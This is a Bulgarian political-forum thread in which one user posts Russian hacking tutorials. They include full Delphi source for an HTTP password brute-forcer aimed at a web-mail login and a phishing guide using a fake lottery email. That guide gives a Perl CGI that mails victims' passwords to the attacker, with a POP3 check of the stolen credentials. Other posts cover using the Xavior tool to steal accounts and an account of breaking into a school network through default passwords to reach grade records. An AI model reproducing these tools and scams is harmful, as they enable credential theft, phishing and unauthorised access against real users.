Клубове Дир.бг
powered by diri.bg
търси в Клубове diri.bg Разширено търсене

Вход
Име
Парола

Клубове
Dir.bg
Взаимопомощ
Горещи теми
Компютри и Интернет
Контакти
Култура и изкуство
Мнения
Наука
Политика, Свят
Спорт
Техника
Градове
Религия и мистика
Фен клубове
Хоби, Развлечения
Общества
Я, архивите са живи
Клубове Дирене Регистрация Кой е тук Въпроси Списък Купувам / Продавам 07:28 26.06.24 
Политика, Свят
   >> Политика
*Кратък преглед

Страници по тази тема: 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | (покажи всички)
Тема Не, ... тукнови [re: Чичko Пapичko]  
Автор Pимл@нин (ProconsulBG)
Публикувано17.10.04 19:29



и е мястото. В ония клубове нямат нужда от такава тема.
... пречи ли ти темата, а? Не само на теб. Преди два месеца една твоя приятелка и подписка беше пуснала за да я трие.Интересно защо? Май Балъците намаляха и номера с Бележките, e-mailа ,ICQ, линковете , вече не винаги минава нали? Особено ако си прочел онова в червеното. Улова отслабна в Клуб Политика Дир.бг. А какви само интересни хора има тук жалко, жалко. Много се радвам ако тази тема ви е бръкнала в гърлото ... знаеш кое е най-опасно ... прозрачност и информираност. Сега всеки Знае и може да решава да стой Открит или Анонимен ... т.е.свобода на избора.
Впрочем ако направим рекапитулация на Никовете "напуснали" клуба и ако го свържем с факта , че " Балъците намаляха"...
Почти вече не пишат в клуба:

Аполон
Цифровия
Другия
Нещо като хамбургер с кетчуп
Великолепната
Марко
Демография,Черокие
Мутра
Информиращ

Със сигурност част от тези хора са просто отекчени от простотията , която понякога се шири тук, но друга част ,просто са загубили интерес поради факта че не успяват така лесно това което искат ... сега те са си намерили
други клубове или чакат по-добро време.

...логично е да си зададем въпроса каква е връзката между тези две неща... Улова и Участието в Клуба...
Впрочем тук е момента да кажа Благодаря на Lucky_Man за подкрепата ...
И не ме занимавай с глупости ако обичаш.



Тема :: Взлом e-mail №2нови [re: Pимлянин]  
Автор Lucky_Man ()
Публикувано20.10.04 19:32



:: Взлом e-mail №2

Стандартной программы по взлому мыла с одной кнопкой "Hack it" не бывает. Есть человеческий фактор, который можно использовать. Попытка взлома мыла - это пару часов и чуть-чуть подождать. Самый лучший метод - социальная инженерия. Писать письма с определенным сообщением, с атачами, подходящими под это сообщение. А не так, как мне один виры уже 2 месяца шлет. Размер - 130 кило. Без комментариев. Задолбался уже в диспечере писем на кнопку "переименовать и удалить" жать, а поставщику его инет услуг написать облом. Скажу сразу обо всех описанных способах - если сразу не получилось, то lim(100)% уже и не получится. Только трата времени и инет-ресурсов. Это были основные выводы по мылу. Эти статьи предоставляют интерес (по моему мнению) с точки зрения исследований и приемов кодинга. А что таким образом исследовать и сканировать - умный человек найдет. Это основные выводы по статьям. Продолжим.
HTTP - сервис.

Восьмидесятый порт (чаще всего). Для написания проги, нам понадобятся дополнительные инструменты для ведения логов некоторых запросов. Это port-mapper или tcp-logger. Программы, способные вести лог запросов по выбранному протоколу. Почему не сниффер? Потому, что забивать гвозди микроскопом не удобно. Для прослушки порта можно взять xspider, по port-mapper есть хорошая статья на www.uinc.ru/index.html, tcp-logger с исходниками можно взять там же. Tcp-logger - это как бы локальный прокси (в броузере надо вписать в поле прокси наш адрес и порт, на котором стоит прога), который получает пакеты от клиента, записывает их в лог и отсылает другому прокси в цепочке. Тот запрашивает сервер и возвращает ответы нам. Тcp-logger получает их, опять пишет лог и передает клиенту. Как и обещал, будем исследовать mail.xakep.ru. Заходим броузером. Видим поля для ввода имени и пароля. Естественно, после ввода данных, будет сформирован и отослан url, содержащий эти данные. Включаем tcp-logger. Вот лог запроса на вход:

GET http://mail.xakep.ru/cgi-bin/mail?username=USER&domain= xakep.ru&password=PASSWORD&submit= %C7%E0%E9%F2%E8+%E2+%FF%F9%E8%EA HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/pdf, */*
Accept-Language: ru
User-Agent: Mozilla/9.0 (compatible; MSIE 9.0; Windows NT 8.0; qwerty)
Host: mail.xakep.ru
Proxy-Connection: Keep-Alive

Для сканера-брутфорсера, нам нужно найти отличие ответов сервера на правильный пароль и не правильный. Для этого надо их ввести. На правильный пароль ответ:

HTTP/1.0 200 OK
Date: Fue, 32 May 2002 08:11:01 GMT
Server: Apache
Cache-Control: no-store
Content-Language: en-us
Pragma: no-cache
Vary: Accept-Language
Content-Type: text/html; charset=windows-1251
X-Cache: MISS from proxy.proxy.proxy
Proxy-Connection: close



...

Вот лог ответа на неправильный пароль:

HTTP/1.0 200 OK
Date: Fue, 32 May 2002 08:11:58 GMT
Server: Apache
Cache-Control: no-store
Content-Language: en-us
Pragma: no-cache
Vary: Accept-Language
Content-Type: text/html; charset=windows-1251
X-Cache: MISS from proxy.proxy.proxy
Proxy-Connection: close




...

Таким образом, для того, чтобы сравнить отличие ответов, надо получить всего около 300 байт (в неправильном пароле есть , в правильном его нет). Брутфорсер будет очень похож на cgi-scaner и брутфорсер для запароленных ресурсов, с одной только разницей, что сравнивать мы будем не первые строки с ответом 200 или 500, а несколько больший кусок данных. По сравнению с брутфорсом для POP3, этот имеет ряд преимуществ:

1) Не надо на каждый запрос инициализировать сокет. Разрыв соединения при неправильном пароле не происходит, поэтому его можно инициализировать только на каждый процесс.

2) Надо послать один запрос и получить один ответ, а не три.

3) Можно использовать стандартный прокси.

Итак, Опять делаем новое приложение, новое окно, кнопку и ProgreesBar. Вот исходники HTTP-брутфорсера:

unit Unit1;
interface
uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
ComCtrls, StdCtrls, WinSock;
type
TForm1 = class(TForm)
Button1: TButton;
ProgressBar1: TProgressBar;
procedure Button1Click(Sender: TObject);
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;

// Описание процесса
type
TScan = class(TThread)
sock2 : TSocket;
addr:TSockAddrIn;
WSAData : TWSAData;
private
procedure CScan;
protected
procedure Execute; override;
end;

var
Form1: TForm1;
// Массив процессов
Sock : array[1..255] of TScan;
Rez : boolean = false;
// Кол-во запущенных процессов на данный момент
I0 : Integer;
// Номер текущего пароля
I : Integer;
// TStringGrid-ы с паролями и с логом
PassList, DopList1 : TStringList;

const
FilePass = 'pass.txt'; // Файл с паролями в каталоге проги
ProcCount = 10; // кол-во процессов
// Адрес прокси через который будет сканирование.
// Лучше отпинговать сначала
HTTPserv = 'proxy.address.net';
User = 'USER';

implementation
// Для преобразование имени
type
TaPInAddr = array [0..255] of PInAddr;
PaPInAddr = ^TaPInAddr;
{R *.DFM}
procedure TForm1.FormCreate(Sender: TObject);
begin
PassList:=TStringList.Create;
DopList1:=TStringList.Create;
end;
// Запуск / Остановка
procedure TForm1.Button1Click(Sender: TObject);
var
J0 : Integer;
begin
if Rez then begin
Rez:=false;
for J0:=1 to I0 do
try Sock[J0].Terminate; except end;
end else begin
// Открытие и загрузка файла паролей
try
PassList.Clear;
PassList.LoadFromFile(FilePass);
except end;
if PassList.Count<=0 then begin
Application.MessageBox('Файл паролей не найден или его нельзя использовать','ERROR',mb_Ok);
exit;
end;
Form1.Button1.Caption:='Stop';
Form1.ProgressBar1.Position:=0;
// Кол-во паролей
Form1.ProgressBar1.Max:=PassList.Count;
Application.ProcessMessages;
I:=0;
I0:=1;
Rez:=true;
// Запустить все процессы
while true do begin
Sock[I0]:=TScan.Create(false);
inc(I0); // Подсчитать их кол-во
//Выйти если больше указанного, или стоп, или подобрали
if (I0>ProcCount)or(not Rez) then break;
if I0 mod 100 = 0 then DopList1.Text:=IntToStr(I0);
end;
end;
end;

// Инициализация процесса
procedure TScan.Execute;
var
iaddr, x0 : Integer;
ph : PHostEnt;
pptr : PaPInAddr;
InAddr : TInAddr;
begin
try
// Инициализация сокета
WSAStartUp(257, WSAData);
sock2:=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
if sock2=INVALID_SOCKET then begin
try closesocket(sock2); except end;
try Terminate; except end;
exit;
end;
// Получение адреса
iaddr := inet_addr(HTTPserv);
if iaddr <=0 then begin
// Если имя, а не IP
ph := gethostbyname(HTTPserv);
if ph = nil then begin
try closesocket(sock2); except end;
try Terminate; except end;
exit;
end;
pptr := PaPInAddr(ph^.h_addr_list);
x0 := 0;
while pptr^[x0] <> nil do begin
InAddr:= pptr^[x0]^;
inc(x0);
addr.sin_addr:=inaddr;
addr.sin_family := AF_INET;
// Порт прокси - 80, 3128, 80808 и т.п.
addr.sin_port := htons(80);
if (connect(sock2, addr, sizeof(addr))) = 0 then break
end;
end else begin
// Если IP
addr.sin_addr.S_addr:=iaddr;
addr.sin_family := AF_INET;
// Порт прокси - 80, 3128, 80808 и т.п.
addr.sin_port := htons(80);
addr.sin_family := AF_INET;
if (connect(sock2, addr, sizeof(addr))) > 0 then begin
try closesocket(sock2); except end;
try Terminate; except end;
exit;
end;
end;
// Запуск цикла
while true do begin
CScan;
if (not Rez)or(I>=PassList.Count) then break;
end;
except end;
dec(I0);
try Terminate; except end;
// Если отмена, закончился список или подобрали
if I0<=1 then begin
Form1.Button1.Caption:='Hack it';
Rez:=false;
Application.ProcessMessages;
DopList1.SaveToFile('log.txt');
end;
end;

// Процедура сканирования
procedure TScan.CScan;
var
x, I2 : Integer;
Buf : String;
begin
I2:=I;
inc(I);
Form1.ProgressBar1.Position:=I2+1;
Application.ProcessMessages;
try
// Формирование url
Buf:='GET http://mail.xakep.ru/cgi-bin/mail?username='+User+'&domain=xakep.ru &password='+PassList.Strings[I2]+'&submit=%C7%E0%E9%F2%E8+%E2+%FF%F9%E8%EA HTTP/1.0';
// Отправка данных
send(sock2,Buf[1],length(Buf),0);
// Получение 300 байт
setlength(Buf,300);
x:=recv(sock2,Buf[1],300,0);
if x<300 then exit;
setlength(Buf,300);
// Если подобрали
if pos(Buf,' Rez:=false;
DopList1.Text:='Pass = '+PassList.Strings[I2];
Application.MessageBox(PChar('Pass = '+PassList.Strings[I2]),'ENJOY',mb_Ok);
exit;
end;
except
end;
end;
end.

Такая конструкция будет достаточно быстро работать. Правда, недостаточно быстро для ОЧЕНЬ БОЛЬШИХ файлов с паролями или прямого перебора. Но само описание и приемы подходят не только для мыла, но и для других HTTP-сервисов. Различные чаты, форумы и т.д. и т.п. Он достаточно просто переделывается в cgi-scaner и в брутфорсер перебора пароля на закрытые на сервере ресурсы.

Анонимность.

Прокси. Для HTTP брутфорсера - уже написано. Надо при инициализации сокета, использовать адрес и порт прокси. Для POP3 и прочего: надо юзать SOCKS-прокси. Всю информацию по использованию и настройке можно почитать здесь.

Публичные прокси.

Например, есть некоторая локальная сеть, из которой осуществляется выход в инет. На сервере стоит прокси сервер для того, чтобы все в локалке могли открывать сайты, получать почту и т.д. и т.п. Как это не странно, но очень многие забывают поставить соответствующий доступ к этому прокси. Т.к. практически все такие прокси поддерживают получение почты, телнет, HTTP, то сформировав запрос соответствующим образом, можно делать практически все. Не говоря уже о запуске брутфорсеров и т.п. через этот прокси, можно получать доступ ко всей локальной сетке. Обратным адресом будет адрес сервера с прокси. Об этом мало говорят, но такие сервера есть и их не так и мало. Таким образом, можно применяя технологию спуфинга, получать мыло у прова с уровнем безопасности из первой статьи (получение почты только при выходе в инет через них). В общем, вариантов использования очень много.

Подведем итоги по безопасности.

1. Если пароль на мыло указать не менее 8-ми случайных цифр и больших, маленьких букв, то подобрать пароль практически невозможно. Используя любой из описанных вариантов. Кол-во возможных вариантов ОЧЕНЬ большое. Это же касается и "Забыл пароль". Для параноиков - его можно менять раз в неделю/месяц.

2. Не пользоваться броузером при получении писем. На всякий случай. Или использовать оперу без установленных сервисов поддержки Java.

3. Не отвечать на подозрительные письма. Лучше быть невежливым, чем... Если есть малейшее подозрение, можешь не сомневаться - это атака на мыло.

4. Отключить в e-mail клиенте авто просмотр html и не пользоваться аутглюком. Есть другие предложения на этом рынке. А ему запретить в firewall вообще куда-либо доступ.

5. Хороший firewall, не только со стандартными функциями и ограничением показа баннеров, но и с автоматическим переименованием приатаченных файлов с выбранными расширениями.

6. Нужно почаще получать письма и удалять их на сервере. Даже если пароль подобран, для чтения писем, атакующему придется очень часто их получать и админ рано или поздно это заметит.

Все это бесполезно, при грамотном осуществлении 3-его способа (см. первую статью).

P.S. Статья и программа предоставлена в целях обучения и вся ответственность за использование ложится на твои хилые плечи.

Breaking the Waves




Тема :: Взлом e-mailнови [re: Pимлянин]  
Автор Lucky_Man ()
Публикувано24.10.04 21:57



Bruteforce - это самый надежный…но самый долгий способ. Реально этот способ может сработать, если пользователь в качестве пароля использует слово из словаря, либо комбинацию 111111. Но если это не так? Средний пароль - это 6-8 символов, причем используются только малые латинские буквы. Таких букв всего 26, поэтому мы имеем от 308915776 до 208827064576 вариантов (формула расчета = количество_букв ^количество_символов_в_пароле).

Конечно попробовать перебрать небольшой словарик никогда не помешает, а вот брутфорсить миллиарды вариантов - это уже тупо… и не спортивно. Но дело было начато хорошее, и давай его продолжим - ты наверно слышал о социальной инженерии? ОК! Тогда давай попробуем заставить "жертву" саму отдать нам свой пароль.

Какова вероятность убедить "жертву" в необходимости такого деяния? Сложно сказать - все зависит от твоей настойчивости и изобретательности. Этот метод не требует сутками сидеть в Инете, достаточно уделять разработке "жертвы" всего несколько минут, но регулярно. А чтобы не быть голословным, я дам тебе конкретный пример:
Предположим, наша "жертва" имеет ящик на какой-нибудь бесплатной почте и читает письма через Web-интерфейс (именно так поступает большинство юзеров).

Для взлома тебе понадобится:

Html-редактор, к примеру - Microsoft Frontpage (есть в расширенной версии MS Office)
Почтовый клиент, мы возьмем Outlook Express (есть в любой Windows)
Ftp-клиент - можешь скачать гиганта вроде CuteFtp, а можешь воспользоваться и Ftp.exe, идущим опять-таки с Windows
Работающая голова и творческий подход ;-)
Итого выходит, что если у тебя Win + расширенный офис, то ничего больше тебе и не понадобится. Приступим?

Шаг 1:

Нужно узнать как можно больше о будущей "жертве": пол, возраст, степень "компьютерной образованности". Причем именно уровню этой самой "образованности" я советую уделить особое внимание - она будет определять твою стратегию.

Шаг 2:

Давай будем исходить из того, что все хотят денег. Причем они совсем не против, чтобы деньги свалились на них совершенно неожиданно, скажем в виде выигрыша. Некоторые покупают лотерейные билеты, другие - играют на скачках или в казино, третьи - сидят дома и ничего не делают (не потому, что они не хотят выиграть, просто они не верят в это и поэтому им жаль денег на ту же лотерею). Ну а если эта лотерея будет бесплатной? Платить ничего не надо, а выиграть можно реальные деньги. Думаешь никто не поверит? Еще как поверит! Ведь жертва уже пользуется бесплатной почтой? Что это дает хозяевам сервера? От нашей "жертвы" вроде бы ничего, но они зарабатывают на рекламе - это наверное знает каждый пользователь бесплатного "мыла". Больше пользователей - больше денег. И тут хозяевам почтового сервиса приходит в голову идея - а почему бы ни разыгрывать среди пользователей небольшие денежные призы? "Поделится" с пользователями, чтобы этим розыгрышем привлечь еще больше людей, а значит увеличить свои доходы.

Но почему-то мысль о проведении подобных лотерей не приходит в голову нужным людям…Поэтому такую лотерею проведем мы, а единственным ее участником будет наша "жертва".

Заходим на ту бесплатную почту, которой пользуется "жертва", регистрируемся. Лучше выбрать адрес вроде: lottery@, prizes@ или что-то подобное, это особенно важно, если также предоставляется место под бесплатный сайт. Предположим, нас интересует "жертва" с почтой victim@mailru.com Заходим на сервер и видим: владелец - Hotbox.ru, кроме mailru.com у них еще pisem.net, hotchat.ru, hotbox.ru, pochtamt.ru, fromru.com, krovatka.net. ОК! Регистрируем lottery@hotbox.ru + в "нагрузку" получаем www.lottery.hotbox.ru ("официальный" сайт лотереи %-).

Теперь не лишним будет зайти во вновь зарегистрированный ящик и проверить его на наличие рекламного письма, по принципу "добро пожаловать на наш сервер. Вы можете воспользоваться следующими дополнительными услугами…..". Если подобные письма высылают - тебе не надо много думать: сохраняй его на винте - примем за образец. Если такого письма не обнаружится - придется "выдрать" одну из страниц на сервере (в качестве образца "фирменного стиля"), или делать все с нуля, но "по образу и подобию".

Шаг 3:

После осознания "фирменного дизайна" можно приступать к составлению письма "жертве". Как ты понимаешь просто отправить ему "мыло" с просьбой выслать свой пароль "в обмен на $1.000.000" - вариант тупиковый. Поэтому над письмом придется поработать. Давай посмотрим на настоящий лотерейный билет, мы увидим:

Кто и зачем проводит данную лотерею
Правила получения выигрыша и сроки
Размеры выигрыша
Игровое поле
Номер билета
Видел такое? Теперь давай все воспроизведем это в нашем "письме". Только игровое поле будет в форме поля, куда надо ввести "код активации", а ниже дадим пояснением:

* Код активации билета совпадает с вашим паролем

Просто, но вместе с тем - действенно. Берем Html-редактор (Frontpage) и начинаем творить. Потом, то "выделяем" то, что получилось и "вставляем" в Outlook. Вероятно тебе понадобится несколько вариантов письма. Зачем? Ну на первый раз тебе могут и не поверить, тогда придется через недельку послать еще одно письмо с билетом второго "тиража", потом третьего - в общем, если человек будет регулярно получать такие ненавязчивые письма (в со второго "тиража" мы включим сведения о выигравших участниках), то он почти гарантированно захочет испытать свою удачу.

Полезный совет:

Не посылай билет в первом письме, лучше вначале послать "пробный шар" в виде рекламного письма "новости нашего сервиса": придумай что-то вроде "на прошлой неделе число пользователей превысило 10 миллионов", "по результатам опроса на Yandex.ru наш почтовый сервис признан четвертым по популярности ресурсом Рунета", а в самом начале, чтобы бросалось в глаза, приведи информацию о том, что планируется проводить такой-растакой розыгрыш, ждите билетов и удачи. Имея такое письмо, "жертва" наверняка быстрее осознает необходимость ввода "кода активации" ;-)

Шаг 4:

Если письмо составлено надо теперь позаботиться о том, чтобы "код активации" из письма попал к нам, а жертва увидела "результаты лотереи". Для этого мы предусмотрели в письме отправку содержимого нашего билета на http://server/check.cgi Как понимаешь, теперь надо сделать сам check.cgi, вот он:

####################
#!/usr/bin/perl -w
use CGI qw(:standard);

my $mailprog = '/usr/sbin/sendmail';
my $mail='xakep@mail.ru';
my $first = param("first");
my $last = param("last");
my $password = param("password");
my $target='victim@mailru.com';

open (MAIL, "|$mailprog -t");
print MAIL "Content-Type: text/plain ";
print MAIL "Subject: YESSSS ";
print MAIL "To: $mail ";
print MAIL "From: '.$target.' ";
print MAIL "first is: $first";
print MAIL "last is: $last";
print MAIL "password is: $password";
close (MAIL);

if (length($password)<3){
$query = CGI::new();
print $query->redirect('http://lottery.hotbox.ru/error.htm');

} else {
$query = CGI::new();
print $query->redirect('http://lottery.hotbox.ru/check.htm');

}
####################

Как это работает: скрипт получает значение полей "билета" и отправляет их тебе письмом (кстати, не забудь указать свой адрес). Далее скрипт смотрит длину поля password (он же "код активации"), если его длина меньше трех символов, то жертву перебрасывает на страницу error.htm (где написано "Баклан! Код активации введен неверно!"), в противном случае - происходит перенаправление на страницу с результатом проверки билета (check.htm).

Данный вариант скрипта, конечно, слишком прост в части проверки истинности "кода активации", но зато универсален и подходит для всех почтовых служб.

Как организовать более продвинутую проверку: если почтовый сервис предоставляет доступ по pop3 и работа клиента через web-интерфейс не блокирует его ящик, то для проверки можно использовать следующий код:

use Net::POP3;

$host = "victim_mail.ru";
$pop3=Net::POP3->new($host);
if ($pop3->login("$first","$password")){
###если пароль подошел переводим жертву на страницу результатов
} else {
### иначе переводим на страницу error.htm
}

Шаг 5:

Осталось создать только сам "официальный сайт лотереи". Для большинства "игроков" необходимо всего три простых страницы:

Титульная - большие и красивые надписи призывающие к участию в "лотерее"
Check.htm - страница, на которой "жертва" номер тиража, номер своего билета и сообщение о том, что "к сожалению билет ничего не выиграл".
Error.htm - страница цель которой напомнить "жертве" о необходимости ввода корректного "кода активации"
Думаю, этот шаг не вызовет у тебя особых проблем - юзай Frontpage + свою фантизию и все будет в порядке: нам же не в конкурсе участвовать, а всего лишь пароль получить ;-)

Финальные аккорд:

У тебя могут возникнуть проблемы с размещением скрипта: где-то вообще нельзя их использовать, где-то будут запрещены внешние коннекты. Но ты можешь разместить скрипт где угодно, к примеру на virtualave.net. Подобная ситуация складывается на Hotbox.ru, где вообще нет скриптов, но при таком подходе это абсолютно не мешает.

Другая проблема - если "жертва" все-таки использует почтовый клиент, а не web-интерфейс. Тогда при отправке из почтового клиента ты просто не получишь значения "кода активации". Выход - либо сделать error.htm точной копией "билета" и просьбой ввести код активации повторно (лучший вариант), либо изменить "письмо" таким образом, что высылать не "билет", а гиперссылку на него, а саму форму "разместить на "официальном сайте" и предложить "жертве" вводить "владельца билета" самостоятельно.

А вообще вариант с "лотереей" далеко не единственный, можно придумать множество других - было бы желание и "жертва" ;-)

Breaking the Waves




Тема :: Взлом HTTP паролей с помощью программы Xaviorнови [re: Pимлянин]  
Автор Lucky_Man ()
Публикувано27.10.04 14:04



:: Взлом HTTP паролей с помощью программы Xavior

Ну что же здарова кул-хакЁр!!!Ты ещё не кул-хакер???Ты ещё не натянул сервак www.whitehouse.gov??? Ты ещё даже не научился выкидывать ЛОМОВ из чата??? Ну так что же, не беда, этому ты научишься позже...

Вот задаёшься ты вопросом: как же этот кул-хакер взломал твоё вэб мыло и от твоего имени рассылает коников и вирей??? Ну ничего сегодня мы тебе расскажем как это делается самым простым способом. Для этого тебе не понадобятся какие-нибудь углубленные знания генной инженерии и знания азбуки Морзе, а так же не понадобится понятие принципа работы электронного розгонятиля протонов в вакууме.

Ну так вот, сначала валишь на http://guest.btinternet.com/~lithiumsoft/xavior/Download.html и сливаем себе рулезную прогу под названием Xavior v1.0 Beta 7.Инсталим,там ничего сложного и сверхъестественного, вот у нас уже есть оружие начинающего Хакера.

Вот запустил ты енту прогу на своей тачке и видишь уродство и говоришь себе: "Блин что это за убожество, отстой, ни картинок тебе, ни нормального ХЕЛПА..." (у меня так и было...=)Но всё пока ты не понимаешь ценности этой вещи. Ну вот например я тебе напишу неполный список того что ты можешь сделать с помощью этой проги:



подобрать пароль к мылу своего заклятого врага и поотсылать от его мыла выря или лошадку(ну тока не Прижевальского, ну да ты сам знаешь...)
поломать ТЕХ. ПОДДЕРЖКУ своего ПРОВА и раздобыть себе ХАЛЯВНЫЙ АККАУНТИК и делать далее усё что твоей хацкерской душеньке угодно (даже продать его=)
раздобыть себе АККАУНТИК к ПОРНУШКЕ и даже если ты таким не увлекаешься (может ты этакий КАЗАНОВА и на этих баб, тем более в голом виде уже смотреть не можешь, тошнит=), то есть много людей готовых за такой АККАУНТИК сделать ТтАаКкОоЕе!!!...уже проверенно...=)))
Ну и многое другое, надеюсь ты сам понимаешь...

Ну хорошо приступим к описанию самой проги. Вот запустил ты её и смотришь...а что же тут делать, а вот сейчас я это и объясню...

Перед тобой менюшка с 6 закладками, о каждой по порядку:

1)Information-это закладка в которой есть такие опции как:

Usernames File-енто файл в котором задаются ЛОГИНЫ
Passes File-это файло в котром задаются ПАРОЛИ
Currently Position Filename-это файл с расширением *.xvp. Вот это и есть хорошая фишка этой програмульки, это значит что ты можешь долбать спокойно какой-то мыл и в нём сложный пасс и требует долгого и упорного долбления, а тут как раз время ночной халявы кончается =).И что делать ты думаешь, а ничего не надо, будет всё снова начинать!!! Прога запомнит позицию долбления и потом начнёт с неё.
Далее идёт status, то есть online или offline (где-то я уже это видел, вот тока никак не припомню=).В правом углу идёт усякая ИНФА типа номера сессии, попыток в секунду, оставшееся время и т.п. Внизу есть 2 окна: первое-всякая инфа ненужная, позиция долбинга (во как сказанул=),второе-окно это списки ЛОГИНОВ и ПАССОВ которые прошли или заканали...кто как называет.

2)закладка General Options-это собственно говоря усе опции, а то есть:

Target(Adress/IP) - ну это адресок того, что собираемся долбить. Port-это порт по которому долбится будем, по умолчанию 80(HTTP)
Directory/File (For WEB servers) - ну а это папка на серваке куда долбится будем, по умолчанию /secure
-Program to masqurade as...-это под что прога шифруется

Number оf Sesions-это кол-во сессий
Далее надо поставить галочку на Auto Save Position every 100 attemps. Потом идёт выбор куда же именно на серваке долбится будем, то есть:

Standart HTTP basic Authentication - это стандартная проверка ЛОГИНПАССА
CGI-BIN/POST - это определение ПАССАЛОГИНА по CGI и в ФОРМАХ
Scripting-это по скрипту
И вот последнее в этой закладке:

Checking Method-метод проверки=):

Loop throught passwrds file once for every user-это прыгать по ПАССАМ на 1 ЛОГИН,потом на 2 ЛОГИН и опять прыжки по ПАССАМ
Make passwrd equal to username-это как я понимаю прога берёт 1 пасс и прыгает по ЛОГИНАМ,вроде так
Brute Force all character combinations-вот это самая рульная вещь,тобиш БРУТ ФОРС или подбор по буквам
3) 3акладка Scripting-установки скрипта.

4) 3акладка Mutators-это мутаторы с помощью их можно например сказать проге что-бы юзала ПАССЫ и ЛОГИНЫ только в маленьких буквах.

5) 3акладка Brute Forcing-установки БРУТ ФОРСА или наборы символов.

6) 3акладка Advanced - вот нужная в натуре вещь, поподробней:

Use WWW Proxy-Web PROXY adress-Port - ну енто использование ПРОКСИ сервака, вещь архинужная и архиважная! Но вот пока не могу понять почему же по умолчанию она отключена %-Е
Sleep between multiple sessions... - пока сам понять не могу нафига оно надо...?
Minimize To Tray - без комментариев...
Use timeouts - это время отдыха проги между долбингом,советую отключить вообще
Log Accepted Names/Passes to "accepted.log"-енто записывать удачные ЛОГИНЫ и ПАССЫ в этот файл.
Ну да ладно этой усей инфы,я лучше расскажу всё на примере: вот например есть ПРОВ и я знаю ЛОГИН (если у юзверя есть мыло, то адрес до @ и есть как всегда ЛОГИНОМ) и знаю что пасс у него состоит где-то из 6 знаков. Мутим раз - берём Melco$oft Notepad-и пишем там ЛОГИН, например superlamer, то бишь мыло у него будет примерно такое: superlames@megaprov.com. Дальше берём любой генератор паролей и задаём ему сгенерировать 1000 паролей с большими и маленькими буквами и с цифрами...есть??? Молодец!!!

Мутим два - осталось настроить прогу и в путь!!! Значит ставим в проге тот именно файл с ЛОГИНОМ который мы там писали (superlamer),подставляем файл с ПАССАМИ которые нам добротно сгенерировала прога-генератор паролей. Дальше ставим адрес, например www.users.superprov.com, отключаем таймаут, включаем прокси (даже если у тебя уже стоит ПРОКСИ, всё равно включи как говорится "Оперативкой КОМП не испортишь!"=), ставим галочку на log accepted...указываем файло для сохранения попыток, что-бы не начинать при обрыве связи всё с начала, и совсем забыл (БООТ сектор у меня дырявый видно=) поставим ГАЛКУ в закладке General Options на Auto Save Posichion every 100 attempts!!!

Всё, ты готов к ворованию аккаунта. Идём в меню Actions (это там вверху) и жмём GO!!!

В заключении хочу сказать что если усё сделано правильно, то должно получится... но надо помнить что разные серваки построены на разный ОС и это может и не заканать. И ещё надо всегда помнить что: ЖАДНОСТЬ ХАКЕРА СГУБИЛА!!! Так что вперёд к новым барьерам (аккаунтам, мылам и т.п.)

Удачного тебе ХАКА мой маленький электронный вор!!!=)

Скачать с зеркала

Breaking the Waves




Тема :: Как я хакнул Американскую школунови [re: Pимлянин]  
Автор Lucky_Man ()
Публикувано30.10.04 20:47



:: Как я хакнул Американскую школу

Привет! Ты естественно знаешь что в Америке компьютеры - повсюду. Да они есть везде - в школах, библиотеках - даже на улицах и в кафе. Естественно тебе открывается много возможностей хака всяких систем. Я расскажу тебе про школьные комп сетки - единственное на чем мне пришлось поработать.

Ну, начнем. На третий день школы, я зашел зарегистрироваться (хотел чтобы мне выдали логин и пароль для работы на школьных компах). Ну прихожу я значит - мне суют какие-то бумажки и т.д. Я думаю нахер надо это все +) Ну и через некоторое время тетка начала добавление пользователя - а я через плечо в это время подглядываю - смотрю, дофига юзверей, дофига групп - все вперемешку.
В общем все что нужно для незаметного шпионского хака! Дали мне логин - а пароль ясно по умолчанию пароль - и надо его потом изменить. Она потом еще сказала что тебе пароль придется менять каждые 3 месяца, да плюс еще на следующий год пароль твой по умолчанию измениться на password и его надо будет опять сменить. Я подумал про себя что эта леди действительно хочет чтобы я чего-нибудь нехорошее с их системой сделал! Ну вот начал я расспрашивать у друзей как зовут тех учеников которые ушли из школы в прошлом году - ну они мне сказали пару челов - ну я и подумал что надо почву прозондировать. Логин формируется из "$первая_буква_имени_фамилия. ну вот я собрал все логины чуваков котоорые перешли в другие школы - залогинился с паролем password - бум . Порнуху могу в школе смотреть почти без боязни быть пойманным.

Второй этап - учительские привилегии (а это оценки и все такое). Тоже самое что и с учениками - тока надо узнать имя учителя который уволился! Узнал - зашел - уже могу даунлоудить файлы и могу читать все НЕТВОРК_ПАПКИ. И у меня есть доступ к программам выставления оценок и посещаемости (у них там нет журналов - все на компах да на Форточках). Ну затем я подумал что неплохо бы мне достать ДОФИГА аккаунтов ну зашел я на компутер под названием student2 (там храниться вся инфа об учащихся - в разных случаях он называется по разному, узнать можно это по ярлычку в Мой Компьютер - там будет написано что-то вроде этого:

$some_login on students2yr2004

Вот там и путь прописан. Так вот я зашел туда и обнаружил что там есть папки называемые yr2001 yr2002 - а ведь учащиеся 2002 и 2001 годов уже нафиг давно ушли со школы И их логины остались и их пароли поманялись на password! Теперь у меня много логинов и я могу терроризировать админа вешаньем компъютеров и всякими подлостями типа мужского или женского полового органа на рабочем столе - и главное чтобы все видели - вот смеху то будет. Затем мне приспичило посмотреть как у меня оценки поживабт. Я скопировал программу Grades на дискетку - поставил на домашнюю тачку эту программу (я взял установочную версию+установленную с оценками в ней - ессесно пароля я не знаю не для одного учителя) Установил свежую прогу себе на винт, сделал себя админом - создал аккаунт и вышел обратно в форточки. Потом отсортировал все файлы по дате - самый первый будет файл который был изменен секунд 9 назад - это профайл "учителя" Ищем файлы с таким же расширением в папке с прогой в которой пресутствуют РЕАЛЬНЫЕ оценки, находим нужный, называем его так же как только что созданный программой файл (это важно, так как если этого не сделаьть то программа не будет читать инфу) Копируем в ту папку где по идее должны храниться все эти файлы - конечно Виндовс вас спросит хотите ли вы заменить файл такой-то таким-то вы шлете ее подальше со своими глупыми вопросами - заменяете файл, запускаете прогу - заходите под админом и меняете пароль для учителя которого вы тока что создали, но который на самомо деле имеет все нужные вам оценки и вот вы уже смотрите все оценки и ... это вроде все Ну вы спросите - НАХ*Й 